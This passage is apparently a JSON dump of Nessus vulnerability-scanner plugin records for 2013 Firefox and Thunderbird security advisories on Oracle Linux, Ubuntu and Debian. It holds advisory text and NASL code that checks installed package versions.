differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 17.0.7 ESR, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.", "edition": 18, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : firefox (ELSA-2013-0981)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:xulrunner", "p-cpe:/a:oracle:linux:firefox", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:xulrunner-devel"], "id": "ORACLELINUX_ELSA-2013-0981.NASL", "href": "https://www.tenable.com/plugins/nessus/68839", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0981 and \n# Oracle Linux Security Advisory ELSA-2013-0981 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68839);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_xref(name:\"RHSA\", value:\"2013:0981\");\n\n script_name(english:\"Oracle Linux 5 / 6 : firefox (ELSA-2013-0981)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2013:0981 :\n\nUpdated firefox packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 17.0.7 ESR, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-June/003548.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-June/003549.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"firefox-17.0.7-1.0.1.el5_9\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"EL5\", reference:\"xulrunner-17.0.7-1.0.1.el5_9\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"xulrunner-devel-17.0.7-1.0.1.el5_9\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"firefox-17.0.7-1.0.1.el6_4\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xulrunner-17.0.7-1.0.1.el6_4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xulrunner-devel-17.0.7-1.0.1.el6_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / xulrunner / xulrunner-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:59", "description": "From Red Hat Security Advisory 2013:0982 :\n\nAn updated thunderbird package that fixes several security issues is\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed content.\nMalicious content could cause Thunderbird to crash or, potentially,\nexecute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Thunderbird allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Thunderbird processed SVG image files\ncould allow an attacker to read data across domains, potentially\nleading to information disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Thunderbird implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nNote: All of the above issues cannot be exploited by a specially\ncrafted HTML mail message as JavaScript is disabled by default for\nmail messages. They could be exploited another way in Thunderbird, for\nexample, when viewing the full remote content of an RSS feed.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 17.0.7 ESR, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the\nchanges to take effect.", "edition": 18, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : thunderbird (ELSA-2013-0982)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:thunderbird"], "id": "ORACLELINUX_ELSA-2013-0982.NASL", "href": "https://www.tenable.com/plugins/nessus/68840", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0982 and \n# Oracle Linux Security Advisory ELSA-2013-0982 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68840);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_xref(name:\"RHSA\", value:\"2013:0982\");\n\n script_name(english:\"Oracle Linux 6 : thunderbird (ELSA-2013-0982)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2013:0982 :\n\nAn updated thunderbird package that fixes several security issues is\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed content.\nMalicious content could cause Thunderbird to crash or, potentially,\nexecute arbitrary code with the privileges of the user running\nThunderbird. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Thunderbird allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Thunderbird processed SVG image files\ncould allow an attacker to read data across domains, potentially\nleading to information disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Thunderbird implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nNote: All of the above issues cannot be exploited by a specially\ncrafted HTML mail message as JavaScript is disabled by default for\nmail messages. They could be exploited another way in Thunderbird, for\nexample, when viewing the full remote content of an RSS feed.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 17.0.7 ESR, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the\nchanges to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-June/003547.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"thunderbird-17.0.7-1.0.1.el6_4\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T07:22:32", "description": "Multiple memory safety issues were discovered in Thunderbird. If the\nuser were tricked into opening a specially crafted message with\nscripting enabled, an attacker could possibly exploit these to cause a\ndenial of service via application crash, or potentially execute\narbitrary code with the privileges of the user invoking Thunderbird.\n(CVE-2013-1682)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user\nwere tricked into opening a specially crafted message with scripting\nenabled, an attacker could possibly exploit these to execute arbitrary\ncode with the privileges of the user invoking Thunderbird.\n(CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope\nof an element could be made to bypass System Only Wrappers (SOW). If a\nuser had scripting enabled, an attacker could potentially exploit this\nto execute arbitrary code with the privileges of the user invoking\nThunderbird. (CVE-2013-1687)\n\nA crash was discovered when reloading a page that contained content\nusing the onreadystatechange event. If a user had scripting enabled,\nan attacker could potentially exploit this to execute arbitrary code\nwith the privileges of the user invoking Thunderbird. (CVE-2013-1690)\n\nJohnathan Kuskos discovered that Thunderbird sent data in the body of\nXMLHttpRequest HEAD requests. If a user had scripting enabled, an\nattacker could exploit this to conduct Cross-Site Request Forgery\n(CSRF) attacks. (CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images\nwith filters. If a user had scripting enabled, an attacker could\nexploit this to view sensitive information. (CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. If a user had\nscripting enabled, an attacker could potentially exploit this to cause\na denial of service via application crash, or execute code with the\nprivileges of the user invoking Thunderbird. (CVE-2013-1694)\n\nIt was discovered that XrayWrappers could be bypassed to call\ncontent-defined methods in certain circumstances. If a user had\nscripting enabled, an attacker could exploit this to cause undefined\nbehaviour. (CVE-2013-1697).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2013-06-27T00:00:00", "title": "Ubuntu 12.04 LTS / 12.10 / 13.04 : thunderbird vulnerabilities (USN-1891-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:canonical:ubuntu_linux:13.04", "p-cpe:/a:canonical:ubuntu_linux:thunderbird", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1891-1.NASL", "href": "https://www.tenable.com/plugins/nessus/67001", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1891-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67001);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_xref(name:\"USN\", value:\"1891-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 12.10 / 13.04 : thunderbird vulnerabilities (USN-1891-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple memory safety issues were discovered in Thunderbird. If the\nuser were tricked into opening a specially crafted message with\nscripting enabled, an attacker could possibly exploit these to cause a\ndenial of service via application crash, or potentially execute\narbitrary code with the privileges of the user invoking Thunderbird.\n(CVE-2013-1682)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user\nwere tricked into opening a specially crafted message with scripting\nenabled, an attacker could possibly exploit these to execute arbitrary\ncode with the privileges of the user invoking Thunderbird.\n(CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope\nof an element could be made to bypass System Only Wrappers (SOW). If a\nuser had scripting enabled, an attacker could potentially exploit this\nto execute arbitrary code with the privileges of the user invoking\nThunderbird. (CVE-2013-1687)\n\nA crash was discovered when reloading a page that contained content\nusing the onreadystatechange event. If a user had scripting enabled,\nan attacker could potentially exploit this to execute arbitrary code\nwith the privileges of the user invoking Thunderbird. (CVE-2013-1690)\n\nJohnathan Kuskos discovered that Thunderbird sent data in the body of\nXMLHttpRequest HEAD requests. If a user had scripting enabled, an\nattacker could exploit this to conduct Cross-Site Request Forgery\n(CSRF) attacks. (CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images\nwith filters. If a user had scripting enabled, an attacker could\nexploit this to view sensitive information. (CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. If a user had\nscripting enabled, an attacker could potentially exploit this to cause\na denial of service via application crash, or execute code with the\nprivileges of the user invoking Thunderbird. (CVE-2013-1694)\n\nIt was discovered that XrayWrappers could be bypassed to call\ncontent-defined methods in certain circumstances. If a user had\nscripting enabled, an attacker could exploit this to cause undefined\nbehaviour. (CVE-2013-1697).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1891-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:13.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|12\\.10|13\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 12.10 / 13.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"thunderbird\", pkgver:\"17.0.7+build1-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"thunderbird\", pkgver:\"17.0.7+build1-0ubuntu0.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"13.04\", pkgname:\"thunderbird\", pkgver:\"17.0.7+build1-0ubuntu0.13.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:47:55", "description": "Multiple security issues have been found in Iceweasel, Debian's\nversion of the Mozilla Firefox web browser: Multiple memory safety\nerrors, use-after-free vulnerabilities, missing permission checks,\nincorrect memory handling and other implementation errors may lead to\nthe execution of arbitrary code, privilege escalation, information\ndisclosure or cross-site request forgery.\n\nThe Iceweasel version in the oldstable distribution (squeeze) is no\nlonger supported with security updates.", "edition": 16, "published": "2013-06-29T00:00:00", "title": "Debian DSA-2716-1 : iceweasel - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-06-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:iceweasel", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2716.NASL", "href": "https://www.tenable.com/plugins/nessus/67101", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2716. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67101);\n script_version(\"1.10\");\n 